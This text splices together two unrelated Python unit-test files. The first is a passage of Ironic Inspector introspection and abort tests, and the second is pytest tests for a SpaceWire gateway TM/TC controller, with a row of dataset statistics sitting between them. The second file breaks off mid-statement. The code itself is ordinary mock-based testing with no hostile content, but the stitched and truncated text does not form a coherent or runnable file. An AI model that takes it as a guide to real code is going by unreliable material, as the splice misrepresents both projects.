cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
@mock.patch.object(ir_utils, 'get_ipmi_address', autospec=True)
def test_resolved_bmc_address(self, ipmi_mock, client_mock, start_mock):
self.node.driver_info['ipmi_address'] = 'example.com'
addresses = ['93.184.216.34', '2606:2800:220:1:248:1893:25c8:1946']
ipmi_mock.return_value = ('example.com',) + tuple(addresses)
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=addresses,
manage_boot=True,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_loopback_bmc_address(self, client_mock, start_mock):
self.node.driver_info['ipmi_address'] = '127.0.0.1'
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[],
manage_boot=True,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_ok_ilo_and_drac(self, client_mock, start_mock):
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
for name in ('ilo_address', 'drac_host'):
self.node.driver_info = {name: self.bmc_address}
introspect.introspect(self.node.uuid)
start_mock.assert_called_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
def test_power_failure(self, client_mock, start_mock):
cli = self._prepare(client_mock)
cli.node.set_power_state.side_effect = exceptions.BadRequest()
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
start_mock.return_value.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_unexpected_error(self, client_mock, start_mock):
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
self.sync_filter_mock.side_effect = RuntimeError()
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
self.assertFalse(cli.node.set_boot_device.called)
start_mock.return_value.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_set_boot_device_failure(self, client_mock, start_mock):
cli = self._prepare(client_mock)
cli.node.set_boot_device.side_effect = exceptions.BadRequest()
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_not_called()
start_mock.return_value.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_no_macs(self, client_mock, start_mock):
cli = self._prepare(client_mock)
self.node_info.ports.return_value = []
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
self.node_info.ports.assert_called_once_with()
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
self.assertFalse(self.node_info.add_attribute.called)
self.assertFalse(self.sync_filter_mock.called)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
def test_no_lookup_attrs(self, client_mock, start_mock):
cli = self._prepare(client_mock)
self.node_info.ports.return_value = []
start_mock.return_value = self.node_info
self.node_info.attributes = {}
introspect.introspect(self.uuid)
self.node_info.ports.assert_called_once_with()
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_no_lookup_attrs_with_node_not_found_hook(self, client_mock,
start_mock):
CONF.set_override('node_not_found_hook', 'example', 'processing')
cli = self._prepare(client_mock)
self.node_info.ports.return_value = []
start_mock.return_value = self.node_info
self.node_info.attributes = {}
introspect.introspect(self.uuid)
self.node_info.ports.assert_called_once_with()
self.assertFalse(self.node_info.finished.called)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
def test_failed_to_get_node(self, client_mock, start_mock):
cli = client_mock.return_value
cli.node.get.side_effect = exceptions.NotFound()
self.assertRaisesRegex(utils.Error,
'Node %s was not found' % self.uuid,
introspect.introspect, self.uuid)
cli.node.get.side_effect = exceptions.BadRequest()
self.assertRaisesRegex(utils.Error,
'%s: Bad Request' % self.uuid,
introspect.introspect, self.uuid)
self.assertEqual(0, self.node_info.ports.call_count)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertFalse(start_mock.called)
self.assertFalse(self.node_info.acquire_lock.called)
def test_failed_to_validate_node(self, client_mock, start_mock):
cli = client_mock.return_value
cli.node.get.return_value = self.node
cli.node.validate.return_value = mock.Mock(power={'result': False,
'reason': 'oops'})
self.assertRaisesRegex(
utils.Error,
'Failed validation of power interface',
introspect.introspect, self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
self.assertEqual(0, self.node_info.ports.call_count)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertFalse(start_mock.called)
self.assertFalse(self.node_info.acquire_lock.called)
def test_wrong_provision_state(self, client_mock, start_mock):
self.node.provision_state = 'active'
cli = client_mock.return_value
cli.node.get.return_value = self.node
self.assertRaisesRegex(
utils.Error, 'Invalid provision state for introspection: "active"',
introspect.introspect, self.uuid)
self.assertEqual(0, self.node_info.ports.call_count)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertFalse(start_mock.called)
self.assertFalse(self.node_info.acquire_lock.called)
def test_inspect_wait_state_allowed(self, client_mock, start_mock):
self.node.provision_state = 'inspect wait'
cli = client_mock.return_value
cli.node.get.return_value = self.node
cli.node.validate.return_value = mock.Mock(power={'result': True})
introspect.introspect(self.uuid)
self.assertTrue(start_mock.called)
@mock.patch.object(time, 'time')
def test_introspection_delay(self, time_mock, client_mock, start_mock):
time_mock.return_value = 42
introspect._LAST_INTROSPECTION_TIME = 40
CONF.set_override('introspection_delay', 10)
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.uuid)
self.sleep_fixture.mock.assert_called_once_with(8)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
# updated to the current time.time()
self.assertEqual(42, introspect._LAST_INTROSPECTION_TIME)
@mock.patch.object(time, 'time')
def test_introspection_delay_not_needed(self, time_mock, client_mock,
start_mock):
time_mock.return_value = 100
introspect._LAST_INTROSPECTION_TIME = 40
CONF.set_override('introspection_delay', 10)
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.uuid)
self.sleep_fixture.mock().assert_not_called()
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
# updated to the current time.time()
self.assertEqual(100, introspect._LAST_INTROSPECTION_TIME)
def test_no_manage_boot(self, client_mock, add_mock):
cli = self._prepare(client_mock)
self.node_info.manage_boot = False
add_mock.return_value = self.node_info
introspect.introspect(self.node.uuid, manage_boot=False)
cli.node.get.assert_called_once_with(self.uuid)
add_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=False,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
self.assertFalse(cli.node.validate.called)
self.assertFalse(cli.node.set_boot_device.called)
self.assertFalse(cli.node.set_power_state.called)
@mock.patch.object(node_cache, 'get_node', autospec=True)
@mock.patch.object(ir_utils, 'get_client', autospec=True)
class TestAbort(BaseTest):
def setUp(self):
super(TestAbort, self).setUp()
self.node_info.started_at = None
self.node_info.finished_at = None
# NOTE(milan): node_info.finished() is a mock; no fsm_event call, then
self.fsm_calls = [
mock.call(istate.Events.abort, strict=False),
]
def test_ok(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
introspect.abort(self.node.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
cli.node.set_power_state.assert_called_once_with(self.uuid, 'off')
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
def test_no_manage_boot(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
self.node_info.manage_boot = False
introspect.abort(self.node.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
self.assertFalse(cli.node.set_power_state.called)
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
def test_node_not_found(self, client_mock, get_mock):
cli = self._prepare(client_mock)
exc = utils.Error('Not found.', code=404)
get_mock.side_effect = exc
self.assertRaisesRegex(utils.Error, str(exc),
introspect.abort, self.uuid)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertEqual(0, self.node_info.finished.call_count)
self.assertEqual(0, self.node_info.fsm_event.call_count)
def test_node_locked(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = False
self.node_info.started_at = time.time()
self.assertRaisesRegex(utils.Error, 'Node is locked, please, '
'retry later', introspect.abort, self.uuid)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertEqual(0, self.node_info.finshed.call_count)
self.assertEqual(0, self.node_info.fsm_event.call_count)
def test_firewall_update_exception(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
self.sync_filter_mock.side_effect = Exception('Boom')
introspect.abort(self.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
cli.node.set_power_state.assert_called_once_with(self.uuid, 'off')
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
def test_node_power_off_exception(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
cli.node.set_power_state.side_effect = Exception('BadaBoom')
introspect.abort(self.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
cli.node.set_power_state.assert_called_once_with(self.uuid, 'off')
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
| 45.914851 | 79 | 0.624186 | 2,791 | 23,187 | 4.858474 | 0.088499 | 0.068437 | 0.083186 | 0.125369 | 0.814086 | 0.78326 | 0.759292 | 0.756047 | 0.739454 | 0.717257 | 0 | 0.005362 | 0.292233 | 23,187 | 504 | 80 | 46.005952 | 0.820913 | 0.028421 | 0 | 0.714286 | 0 | 0 | 0.030384 | 0.00151 | 0 | 0 | 0 | 0 | 0.345865 | 1 | 0.065163 | false | 0 | 0.032581 | 0 | 0.107769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f1f2c7eeb48036250c1f2f70a4ccae625cac346 | 49,234 | py | Python | tests/unit_tests/test_component/marketplace/spacewire_gateway_hvs_h8823/test_spacewire_gateway_hvs_h8823_tmtc.py | ismaelJimenez/mamba_server | e6e2343291a0df24f226bde0d13e5bfa74cc3650 | [
"MIT"
] | null | null | null | tests/unit_tests/test_component/marketplace/spacewire_gateway_hvs_h8823/test_spacewire_gateway_hvs_h8823_tmtc.py | ismaelJimenez/mamba_server | e6e2343291a0df24f226bde0d13e5bfa74cc3650 | [
"MIT"
] | null | null | null | tests/unit_tests/test_component/marketplace/spacewire_gateway_hvs_h8823/test_spacewire_gateway_hvs_h8823_tmtc.py | ismaelJimenez/mamba_server | e6e2343291a0df24f226bde0d13e5bfa74cc3650 | [
"MIT"
] | null | null | null | import os
import pytest
import copy
import time
import socket
from rx import operators as op
from mamba.core.testing.utils import compose_service_info, get_config_dict, CallbackTestClass, get_provider_params_info
from mamba.core.context import Context
from mamba.marketplace.components.simulator.spacewire_gateway_hvs_h8823_tmtc_sim import H8823GatewayTmTcMock
from mamba.marketplace.components.spacewire_gateway.hvs_h8823_tmtc import H8823TmTcController
from mamba.core.exceptions import ComponentConfigException
from mamba.core.msg import Empty, ServiceRequest, ServiceResponse, ParameterType
component_path = os.path.join('marketplace', 'components', 'spacewire_gateway',
'hvs_h8823_tmtc')
class TestClass:
def setup_class(self):
""" setup_class called once for the class """
self.mamba_path = os.path.join(os.path.dirname(__file__), '..', '..',
'..', '..', '..', 'mamba')
self.default_component_config = get_config_dict(
os.path.join(self.mamba_path, component_path, 'config.yml'))
self.default_service_info = compose_service_info(
self.default_component_config)
def teardown_class(self):
""" teardown_class called once for the class """
pass
def setup_method(self):
""" setup_method called for every method """
self.context = Context()
self.context.set(
'mamba_dir',
os.path.join(os.path.dirname(__file__), '..', '..', '..', '..',
'..', 'mamba'))
def teardown_method(self):
""" teardown_method called for every method """
del self.context
def test_wo_context(self):
""" Test component behaviour without required context """
with pytest.raises(TypeError) as excinfo:
H8823TmTcController()
assert "missing 1 required positional argument" in str(excinfo.value)
def test_w_default_context_component_creation(self):
""" Test component creation behaviour with default context """
component = H8823TmTcController(self.context)
# Test default configuration load
assert component._configuration == self.default_component_config
# Test custom variables default values
assert component._shared_memory == {}
assert component._shared_memory_getter == {}
assert component._shared_memory_setter == {}
assert component._parameter_info == {}
assert component._inst is None
assert component._inst_cyclic_tm is None
assert component._inst_cyclic_tm_thread is None
assert component._cyclic_tm_mapping == {}
assert component._instrument.address == '0.0.0.0'
assert component._instrument.port is None
assert component._instrument.tc_port == 12345
assert component._instrument.tm_port == 12346
assert component._instrument.encoding == 'utf-8'
assert component._instrument.terminator_write == '\n'
assert component._instrument.terminator_read == '\n'
def test_w_default_context_component_initialization(self):
""" Test component initialization behaviour with default context """
component = H8823TmTcController(self.context)
component.initialize()
# Test default configuration load
assert component._configuration == self.default_component_config
# Test custom variables default values
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 0,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert component._shared_memory_getter == {
'bytes_received_counter': 'bytes_received_counter',
'connected': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
assert component._shared_memory_setter == {
'bytes_received_counter': 'bytes_received_counter',
'connect': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
assert component._parameter_info == self.default_service_info
assert component._inst is None
assert component._inst_cyclic_tm is None
assert component._inst_cyclic_tm_thread is None
assert component._cyclic_tm_mapping == {
'bytes_received_counter': 'SPWG_TM_SPW_RX_BYTE_CTR {:}',
'credit_error_counter': 'SPWG_TM_SPW_CRED_ERR_CTR {:}',
'disconnect_error_counter': 'SPWG_TM_SPW_DISC_ERR_CTR {:}',
'eep_received_counter': 'SWPG_TM_SPW_RX_EEP_CTR {:}',
'eep_sent_counter': 'SPWG_TM_SPW_TX_EEP_CTR {:}',
'eop_received_counter': 'SPWG_TM_SPW_RX_EOP_CTR {:}',
'eop_sent_counter': 'SPWG_TM_SPW_TX_EOP_CTR {:}',
'escape_error_counter': 'SPWG_TM_SPW_ESC_ERR_CTR {:}',
'parity_error_counter': 'SPWG_TM_SPW_PAR_ERR_CTR {:}',
'spw_link_autostart': 'SPWG_TM_SPW_AUTOSTART {:}',
'spw_link_bytes_sent_counter': 'SPWG_TM_SPW_TX_BYTE_CTR {:}',
'spw_link_enabled': 'SPWG_TM_SPW_ENABLED {:}',
'spw_link_running': 'SPWG_TM_SPW_RUNNING {:}',
'spw_link_rx_rate': 'SPWG_TM_SPW_RX_RATE {:}',
'spw_link_start': 'SPWG_TM_SPW_START {:}',
'spw_link_status': 'SPWG_TM_SPW_STS {:}',
'spw_link_tcp_connected': 'SPWG_TM_SPW_TCP_CONN {:}',
'spw_link_timecode_enabled': 'SPWG_TM_SPW_TIMECODE_ENABLED {:}',
'spw_link_tx_rate': 'SPWG_TM_SPW_TX_CLK {:}',
'ticks_received_counter': 'SPWG_TM_SPW_RX_TICK_CTR {:}'
}
assert component._instrument.address == '0.0.0.0'
assert component._instrument.port is None
assert component._instrument.tc_port == 12345
assert component._instrument.tm_port == 12346
assert component._instrument.encoding == 'utf-8'
assert component._instrument.terminator_write == '\n'
assert component._instrument.terminator_read == '\n'
def test_w_custom_context(self):
""" Test component creation behaviour with default context """
component = H8823TmTcController(
self.context,
local_config={
'name': 'custom_name',
'instrument': {
'port': 9000
},
'parameters': {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
type: str
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
}
})
component.initialize()
custom_component_config = copy.deepcopy(self.default_component_config)
custom_component_config['name'] = 'custom_name'
custom_component_config['instrument']['port'] = 9000
custom_component_config['parameters']['new_param'] = {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
type: str
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
# Test default configuration load
assert component._configuration == custom_component_config
# Test custom variables default values
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 0,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert component._shared_memory_getter == {
'bytes_received_counter': 'bytes_received_counter',
'connected': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
assert component._shared_memory_setter == {
'bytes_received_counter': 'bytes_received_counter',
'connect': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
custom_service_info = compose_service_info(custom_component_config)
assert component._parameter_info == custom_service_info
assert component._inst is None
assert component._inst_cyclic_tm is None
assert component._inst_cyclic_tm_thread is None
assert component._cyclic_tm_mapping == {
'bytes_received_counter': 'SPWG_TM_SPW_RX_BYTE_CTR {:}',
'credit_error_counter': 'SPWG_TM_SPW_CRED_ERR_CTR {:}',
'disconnect_error_counter': 'SPWG_TM_SPW_DISC_ERR_CTR {:}',
'eep_received_counter': 'SWPG_TM_SPW_RX_EEP_CTR {:}',
'eep_sent_counter': 'SPWG_TM_SPW_TX_EEP_CTR {:}',
'eop_received_counter': 'SPWG_TM_SPW_RX_EOP_CTR {:}',
'eop_sent_counter': 'SPWG_TM_SPW_TX_EOP_CTR {:}',
'escape_error_counter': 'SPWG_TM_SPW_ESC_ERR_CTR {:}',
'parity_error_counter': 'SPWG_TM_SPW_PAR_ERR_CTR {:}',
'spw_link_autostart': 'SPWG_TM_SPW_AUTOSTART {:}',
'spw_link_bytes_sent_counter': 'SPWG_TM_SPW_TX_BYTE_CTR {:}',
'spw_link_enabled': 'SPWG_TM_SPW_ENABLED {:}',
'spw_link_running': 'SPWG_TM_SPW_RUNNING {:}',
'spw_link_rx_rate': 'SPWG_TM_SPW_RX_RATE {:}',
'spw_link_start': 'SPWG_TM_SPW_START {:}',
'spw_link_status': 'SPWG_TM_SPW_STS {:}',
'spw_link_tcp_connected': 'SPWG_TM_SPW_TCP_CONN {:}',
'spw_link_timecode_enabled': 'SPWG_TM_SPW_TIMECODE_ENABLED {:}',
'spw_link_tx_rate': 'SPWG_TM_SPW_TX_CLK {:}',
'ticks_received_counter': 'SPWG_TM_SPW_RX_TICK_CTR {:}'
}
def test_w_wrong_custom_context(self):
""" Test component creation behaviour with default context """
# Test with wrong topics dictionary
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': 'wrong'
}).initialize()
assert 'Parameters configuration: wrong format' in str(excinfo.value)
# In case no new parameters are given, use the default ones
component = H8823TmTcController(self.context,
local_config={'parameters': {}})
component.initialize()
assert component._configuration == self.default_component_config
# Test with missing address
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'instrument': {
'address': None
}
}).initialize()
assert "Missing address in Instrument Configuration" in str(
excinfo.value)
# Test with missing port
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'instrument': {
'port': None
}
}).initialize()
assert "Missing port in Instrument Configuration" in str(excinfo.value)
# Test case properties do not have a getter, setter or default
component = H8823TmTcController(
self.context, local_config={'parameters': {
'new_param': {}
}})
component.initialize()
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 0,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
def test_io_signature_publication(self):
""" Test component io_signature observable """
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_service_signature'].subscribe(
dummy_test_class.test_func_1)
component = H8823TmTcController(self.context)
component.initialize()
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 1
received_params_info = str([
str(parameter_info)
for parameter_info in dummy_test_class.func_1_last_value
])
expected_params_info = str([
str(parameter_info) for parameter_info in get_provider_params_info(
self.default_component_config, self.default_service_info)
])
assert received_params_info == expected_params_info
component = H8823TmTcController(
self.context,
local_config={
'name': 'custom_name',
'instrument': {
'address': '1.2.3.4'
},
'parameters': {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
type: str
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
}
})
component.initialize()
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 2
custom_component_config = copy.deepcopy(self.default_component_config)
custom_component_config['name'] = 'custom_name'
custom_component_config['instrument']['address'] = 8071
parameters = {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
type: str
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
}
parameters.update(custom_component_config['parameters'])
custom_component_config['parameters'] = parameters
custom_service_info = compose_service_info(custom_component_config)
received_params_info = str([
str(parameter_info)
